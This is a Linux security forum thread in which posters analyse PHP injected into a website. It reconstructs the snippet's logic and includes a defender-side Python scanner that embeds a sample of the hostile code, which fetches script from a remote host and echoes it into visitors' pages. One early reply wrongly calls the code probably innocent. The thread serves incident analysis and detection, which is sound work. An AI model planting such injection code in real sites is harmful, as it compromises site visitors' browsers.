Linux - Security: This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
It is formatted oddly, possibly some type of code injection. What happens when you run the code? It looks like it would cause an error. A little later today I'm going to give this code a little attention; I have no idea what the preg_match is for.
Analyzing the code that is present here, it does not superficially seem to me that the code is malicious, although it is obviously machine-generated as evidenced by the variable-names ... as well as by the beginning and ending recognition-tags that bracket the code. I also know that curl() is fundamentally a mechanism for initiating a programmatic HTTP "ping" against a remote web site. So maybe this is simply some kind of instrumentation code, designed to let someone out there gather usage-statistics ... that "someone" being, say, the legitimate owner of the code/site.
I don't recognize which automated utility might have generated this code-sequence, but I can say pretty certainly that it was generated in such a way, and that it was designed to be removable by the same utility with equal ease. If you know who authored the original page, or can contact them, they can probably tell you right away.
My instincts tell me, however, that this code is probably innocent.
Last edited by sundialsvcs; 02-09-2014 at 02:05 PM.
I disagree, superficial analysis shows that if it is there without the website owner's knowledge, then it is an entirely malicious method of injecting content/code from a remote site into the page.
Here is a summary of what it does in pseudo code but with the actual variable names and paths:
Code:
error_reporting(0) - Disable the page's error reporting to avoid detection
$wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'] - Get the user agent string
Test if it is a browser and not a bot, if so...
$wp_srx096146="http://htmlvalue.com/value/?ip=..."
Makes remote request with user IP addr, page referer and user agent, useful for delivering ads,
but also useful for more nefarious purposes such as automated compromise attempts of the user
machine...
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_6146srx = curl_exec ($ch);
Fetches "something" from the remote host htmlvalue.com and assigns it to a new variable $wp_6146srx
if ( substr($wp_6146srx,1,3) === 'scr' ) {
echo $wp_6146srx;
}
Finally, if the expected something was returned as identified by characters 1-3='scr',
echo it into the web page...
Now, note that the final test matches <script>, so undoubtedly it is fetching and injecting javascript into the user's web page. At this point they own the browser view of that page...
They may be injecting ads, or they may be injecting something MUCH worse...
A sure-fire way to see what it is injecting is to put your IP address into the following URL and fetch it with wget. I have not done so as I do not want to launch a bot attack on my own IP!
This part is only the reporting part about browsers that visited this page, and looks like a simple statistics counter, but:
It looks like you have other parts of code injecting something into the rest of the page(s).
Then this report becomes interesting for the attacker, about infected browsers.
1. Restore from good backup.
2. Make most things read only.
3. Close outgoing traffic with the firewall (if possible).
I'm sorry but Corpus-Khu should never have made that suggestion in the first place. (In a VM maybe, but you simply don't go around asking a victim to run code, especially code you don't understand yourself.)
The focus should have been on examining the extent of the damage, finding out how this could have taken place and then taking the appropriate measures.
Now you posted this on the 9th, meaning almost 2 weeks have passed, so please first tell me you did more for this server than play with Wireshark?
What did you do?
What did you find out?
I found nothing......
Wireshark seems to show that he tries to get info from the server, but I'm not sure.
The dummy server did not show anything else in the logs.
The running server is (seems) fine.
But other than finding out how the code got there, and removing it, it really isn't about the server!
The malicious traffic is not between that code and your server, it is between the remote host which the script contacts and the client which loads the script code from your server! So watching your own traffic log will not really show anything!
As Habitual asked, have you removed the code from all the files where you found it?
Looking for your code you won't find much, but search for another wp_ value... Seems quite widespread. Anyway, here is another explanation, in line with what astrogeek wrote, and this points to a possible infection vector, leeched FTP credentials basically. Please check any machine with admin access for viruses and malware, check your server logs for intrusions and check whatever is installed in your web stack for no longer maintained plugins or themes and basically any software versions considered stale or vulnerable.
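As an added defender-side example (not code from this thread or from any poster), here is a small Python scanner that looks for the indicators listed in the pseudo-code breakdown earlier in the thread (error_reporting(0), the user-agent check, a curl_exec() result echoed into the page) plus the generated-looking wp_ variable names the post above suggests searching for. The embedded PHP string is a constructed sample that mimics the described snippet, the wp_ name pattern is a heuristic, and the three-indicator threshold is an assumption to tune for your own tree.

```python
import os
import re

# Constructed sample that mimics the injected snippet analysed in this thread (not the real file).
SAMPLE_INJECTED = r'''<?php
error_reporting(0);
$wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'];
if (!preg_match('/bot|crawl|spider/i', $wp_srx6146)) {
    $ch = curl_init("http://htmlvalue.com/value/?ip=" . $_SERVER['REMOTE_ADDR']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_6146srx = curl_exec($ch);
    if (substr($wp_6146srx, 1, 3) === 'scr') { echo $wp_6146srx; }
}
?>'''

# Indicators taken from the thread's breakdown of the snippet; the wp_ one is a heuristic:
# generated names such as $wp_srx6146 mix letters and digits, real globals ($wp_query) do not.
INDICATORS = {
    "silenced_errors": re.compile(r'error_reporting\s*\(\s*0\s*\)'),
    "ua_check": re.compile(r'\$_SERVER\s*\[\s*[\'"]HTTP_USER_AGENT[\'"]\s*\]'),
    "remote_fetch": re.compile(r'curl_exec\s*\('),
    "odd_wp_var": re.compile(r'\$wp_(?=[a-z0-9]*\d)[a-z0-9]+'),
}

def echoed_fetch_vars(src):
    """Variables assigned from curl_exec() that are later echoed into the page."""
    assigned = set(re.findall(r'(\$\w+)\s*=\s*curl_exec\s*\(', src))
    return sorted(v for v in assigned if re.search(r'echo\s+' + re.escape(v) + r'\b', src))

def scan(src):
    """Score one PHP source string; three or more indicators is worth a manual look."""
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    hits["echoes_remote_content"] = bool(echoed_fetch_vars(src))
    score = sum(hits.values())
    return {"hits": hits, "score": score, "suspicious": score >= 3}

def scan_tree(root):
    """Walk a web root; return {path: result} for each .php file that scores as suspicious."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = scan(fh.read())
            if result["suspicious"]:
                flagged[path] = result
    return flagged
```

Run scan_tree() against a copy of the web root taken from backup as well as the live one; a file that is flagged in the live tree but not in the backup is a good candidate for the injected code.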
For web 101 class today, I have prepared a simple sequence diagram to illustrate where your server and the malicious script fit into the overall scheme of such... schemes.
Hopefully it will make clear that your server is only a vector for delivering the script, which is itself a vector for delivering additional scripts and potentially gaining access to and control of the client machine, i.e. your site visitors.
The sequence of events is from top to bottom, in the direction of the various arrows.
Note that looking at traffic on your server will see very little, only the delivery of the page code, including the script tag, to your site visitors. Everything else takes place after that point and is between one or more remote sites and the client machine itself - not visible to you!
Important to note is not only that they can and usually do vector to other URLs to load additional malware, but beyond the initial script request they have the IP address of your visitors, and everything that they can connect to it! They can then launch exploits directly against the client machine, not only via their browser... this is how botnets are constructed.
The follow on effects are spam email, DDOS attacks, banking and credit card fraud, targeted phishing attacks, extortions, threats, con games, manipulations, viruses, worms, Obamacare and just about every other assorted fraud and crime against otherwise innocent victims - all because they visited your website!
Please confirm that you have removed the code from your servers!